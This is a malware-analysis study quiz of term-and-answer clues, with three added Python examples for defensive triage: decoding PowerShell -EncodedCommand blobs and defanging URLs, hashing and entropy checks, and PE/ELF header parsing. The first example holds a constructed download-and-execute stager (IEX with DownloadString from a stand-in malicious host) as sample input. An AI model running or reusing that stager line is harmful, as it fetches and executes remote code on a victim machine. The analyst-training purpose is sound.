A tool from the FLARE team that extracts (including obfuscated and stack) strings from PE files, or a piece of string used to clean your teeth.
What is FLOSS?
An Internet simulator included in the Windows FLARE VM, used with the VirtualBox network adapter set to NAT mode.
What is FakeNet (FakeNet-NG)?
Type of shell where the victim's machine opens a listening port and waits for the attacker to connect in.
What is a bind shell?
A Sysinternals tool that helps identify which persistence mechanism (run keys, scheduled tasks, services, and so on) a piece of malware has installed.
What is Autoruns?
Altering a sample or indicator so it cannot be run or clicked by accident (for example renaming the extension, or writing hxxp:// and example[.]com instead of the live URL).
What is defanging?
A popular website for identifying malware, either by uploading a sample or by searching for its hash value.
What is VirusTotal?
A network protocol analyzer used to capture network-based indicators such as DNS lookups and HTTP requests.
What is Wireshark?
The most common encoding used to obfuscate PowerShell commands (for example the blob passed to -EncodedCommand).
What is Base64?
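As an added example (not part of the original quiz), the following Python decodes a PowerShell -EncodedCommand blob and defangs the URLs it finds, tying together the Base64 and defanging clues. The encoded stager, the hostname malicious.example and the path stage2.ps1 are constructed for this example; the one real-world detail it demonstrates is that PowerShell encodes the UTF-16LE bytes of the script, so decoding the blob as plain ASCII yields NUL-interleaved text that URL regexes miss.

```python
import base64
import re

# Constructed sample stager (not from any real incident). This is the script text an
# attacker would pass through:  powershell.exe -nop -w hidden -EncodedCommand <blob>
PLAINTEXT_SCRIPT = (
    "IEX (New-Object Net.WebClient).DownloadString("
    "'http://malicious.example/stage2.ps1')"
)
# PowerShell base64-encodes the UTF-16LE bytes of the script, not UTF-8/ASCII.
ENCODED_COMMAND = base64.b64encode(PLAINTEXT_SCRIPT.encode("utf-16-le")).decode("ascii")

URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)


def decode_encoded_command(blob: str) -> str:
    """Decode a -EncodedCommand blob back to script text.

    Decoding as ASCII instead of UTF-16LE is the classic mistake: the output
    reads 'I\\x00E\\x00X\\x00' and regexes for URLs silently miss everything.
    Whitespace and missing '=' padding (common in blobs copied out of logs) are repaired.
    """
    blob = "".join(blob.split())
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le")


def extract_urls(script: str) -> list[str]:
    return URL_RE.findall(script)


def defang(indicator: str) -> str:
    """Defang a URL or hostname so it cannot be clicked or auto-linked:
    http://evil.example/a.ps1 -> hxxp://evil[.]example/a[.]ps1"""
    out = re.sub(r"^http", "hxxp", indicator, flags=re.IGNORECASE)
    return out.replace(".", "[.]")


def refang(indicator: str) -> str:
    """Undo defang() when you deliberately need the live indicator back."""
    out = re.sub(r"^hxxp", "http", indicator, flags=re.IGNORECASE)
    return out.replace("[.]", ".")


def triage_encoded_command(blob: str) -> dict:
    """Decode, pull network IOCs, and return them already defanged for a report."""
    script = decode_encoded_command(blob)
    return {"script": script, "iocs": [defang(u) for u in extract_urls(script)]}


if __name__ == "__main__":
    result = triage_encoded_command(ENCODED_COMMAND)
    print(result["script"])
    for ioc in result["iocs"]:
        print("IOC:", ioc)
```

Paste a blob captured from a process command line (ProcMon or Sysmon event ID 1 both show it) into triage_encoded_command; the IOCs come back defanged so they can go straight into notes without risk of a click.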
A tool used to snapshot the Windows registry before and after malware is detonated, then compare the two.
What is Regshot?
Malware whose job is to install or launch the actual payload on the victim machine rather than carry out the final objective itself.
What is a dropper?
A popular hashing algorithm used to identify malware samples. Aww shucks... they found me!
What is SHA-256?
It's the server that the malware connects to, which then instructs the malware on how to behave.
What is a command-and-control (C2) server?
Type of shell where the victim machine reaches out and connects back to the attacker.
What is a reverse shell?
A way in which attackers compress or encrypt malware to obfuscate it and attempt to evade antivirus solutions.
What is packing?
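As an added example (not part of the original quiz), the following Python does the two static triage steps behind the SHA-256 and packing clues: it computes the hashes you would search on VirusTotal, and it measures Shannon entropy, the usual first heuristic for spotting packed or encrypted content. The two byte blobs are constructed stand-ins, not real samples, and the 7.0 bits/byte threshold is a rule of thumb, not a standard.

```python
import hashlib
import math
import random
from collections import Counter

# Constructed stand-ins, not real samples: repetitive text versus pseudo-random
# bytes seeded for reproducibility (packed/encrypted sections look like the latter).
PLAIN_SAMPLE = b"This program cannot be run in DOS mode.\r\n" * 32
PACKED_SAMPLE = random.Random(1337).randbytes(4096)

PACKED_THRESHOLD = 7.0  # rule of thumb; compressed sections usually sit well above 7 bits/byte


def file_hashes(data: bytes) -> dict[str, str]:
    """MD5, SHA-1 and SHA-256 of a sample. Any one of these can be searched on
    VirusTotal without uploading the file, which matters when the sample is
    sensitive or you do not want to tip off the attacker that it was found."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a single repeated byte value,
    8.0 for perfectly uniform data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def is_likely_packed(data: bytes, threshold: float = PACKED_THRESHOLD) -> bool:
    """High entropy is the classic packing/encryption tell. It is only a heuristic:
    confirm with section names, a tiny import table, and a look in PE-bear."""
    return shannon_entropy(data) >= threshold


def triage(data: bytes) -> dict:
    """Everything a first-pass static report needs from the raw bytes."""
    return {
        **file_hashes(data),
        "entropy": round(shannon_entropy(data), 2),
        "likely_packed": is_likely_packed(data),
    }


if __name__ == "__main__":
    for label, sample in (("plain", PLAIN_SAMPLE), ("packed", PACKED_SAMPLE)):
        print(label, triage(sample))
    # A single flipped byte gives an unrelated SHA-256, which is why a repacked
    # sample will not be found by hash lookup even though the code is the same.
    modified = PLAIN_SAMPLE[:-1] + b"!"
    print("hash survives one-byte change:",
          file_hashes(PLAIN_SAMPLE)["sha256"] == file_hashes(modified)["sha256"])
```

Run triage over a whole file for a quick verdict, or over each PE section individually: a high-entropy .text section alongside an almost empty import table is the typical packed profile.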
The HTTP method used to request and retrieve files from URLs.
What is GET?
A tool used to identify the architecture of PE files and the APIs they import, which also sounds like a very large animal (black, brown, or the white kind).
What is PE-bear?
An Internet simulator built into REMnux.
What is INetSim?
A scripting language normally used by Windows administrators to automate tasks, which attackers also use to manipulate files, exfiltrate data, or download malware to the victim's computer.
What is PowerShell?
Malware sometimes creates this named object so that only one instance of itself runs at a time; its name also makes a handy host-based indicator.
What is a mutex?
Two terms for the practice of saving second-stage malware on the victim machine under a different name from the one it had on the attacker's server.
What are decoupling or dechaining?
A tool used to de-obfuscate encoded or encrypted data; it's good with knives.
What is CyberChef?
A Sysinternals tool for real-time monitoring of a detonated sample's file, registry, network and process activity, filtered by process name, whose process tree also shows parent and child processes.
What is Process Monitor (ProcMon)?
A command-line networking utility used to open listeners and make raw TCP or UDP connections, for example to catch a bind or reverse shell.
What is Netcat?
The executable file format of Linux binaries, or Santa's little helper.
What is an ELF?
The file type that holds the Windows API functions a PE file imports in order to use them.
What are DLL files?
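As an added example (not part of the original quiz), the following Python does by hand what PE-bear's summary and the strings pass of FLOSS do: it reads the magic bytes and header fields to tell an ELF from a PE, reports the architecture, checks the IMAGE_FILE_DLL characteristic bit to separate DLLs from EXEs, and extracts both ASCII and UTF-16LE ("wide") strings. The constants come from the PE and ELF specifications; the two sample files, the hostname c2.example, and the make_pe/make_elf helpers are constructed for the example and contain only the header fields that are parsed.

```python
import re
import struct

# Constants from the PE (IMAGE_FILE_HEADER) and ELF (e_ident/e_type/e_machine) specs.
PE_MACHINES = {0x014C: "x86", 0x8664: "x64", 0x01C4: "ARMv7", 0xAA64: "ARM64"}
IMAGE_FILE_DLL = 0x2000
ELF_MACHINES = {0x03: "x86", 0x3E: "x86-64", 0x28: "ARM", 0xB7: "AArch64"}
ELF_TYPES = {2: "executable", 3: "shared object or PIE"}


def identify(data: bytes) -> dict:
    """Classify a blob by its magic bytes and header fields, the way `file` or
    PE-bear's summary does. Headers are parsed defensively: a bogus e_lfanew in a
    hostile sample must not crash the triage script."""
    if data[:4] == b"\x7fELF" and len(data) >= 20:
        e_type, e_machine = struct.unpack_from("<HH", data, 16)  # little-endian EI_DATA assumed
        return {
            "format": "ELF",
            "bits": {1: 32, 2: 64}.get(data[4], 0),
            "arch": ELF_MACHINES.get(e_machine, hex(e_machine)),
            "kind": ELF_TYPES.get(e_type, hex(e_type)),
        }
    if data[:2] == b"MZ":
        if len(data) < 0x40:
            return {"format": "MZ", "kind": "truncated DOS header"}
        (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
        if len(data) < e_lfanew + 24 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return {"format": "MZ", "kind": "DOS executable or corrupt PE"}
        (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)          # IMAGE_FILE_HEADER.Machine
        (characteristics,) = struct.unpack_from("<H", data, e_lfanew + 22)  # IMAGE_FILE_HEADER.Characteristics
        return {
            "format": "PE",
            "arch": PE_MACHINES.get(machine, hex(machine)),
            "kind": "DLL" if characteristics & IMAGE_FILE_DLL else "EXE",
        }
    return {"format": "unknown"}


def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Static strings like `strings` or FLOSS's static pass: printable ASCII runs plus
    UTF-16LE ('wide') runs, which plain `strings` misses and Windows malware is full of."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in wide_re.finditer(data)]
    return found


# Constructed minimal headers for the example; real files carry section tables and more.
def make_pe(machine: int, characteristics: int) -> bytes:
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE signature right after the DOS header
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0, characteristics)
    return bytes(dos) + b"PE\0\0" + coff


def make_elf(ei_class: int, e_type: int, e_machine: int) -> bytes:
    ident = b"\x7fELF" + bytes([ei_class, 1, 1, 0]) + bytes(8)
    return ident + struct.pack("<HH", e_type, e_machine) + bytes(44)


SAMPLE_DLL = (make_pe(0x8664, 0x2022)                       # x64, EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE | DLL
              + "kernel32.dll".encode("utf-16-le") + b"\x00\x00"
              + b"http://c2.example/beacon\x00")
SAMPLE_ELF = make_elf(2, 3, 0x3E)                            # 64-bit, ET_DYN, x86-64

if __name__ == "__main__":
    for name, blob in (("dll", SAMPLE_DLL), ("elf", SAMPLE_ELF)):
        print(name, identify(blob), extract_strings(blob))
```

Point identify() and extract_strings() at the bytes of a real sample (open(path, "rb").read()) to get the same architecture/DLL verdict PE-bear shows, plus the wide strings that hide imported DLL names and URLs from an ASCII-only strings run.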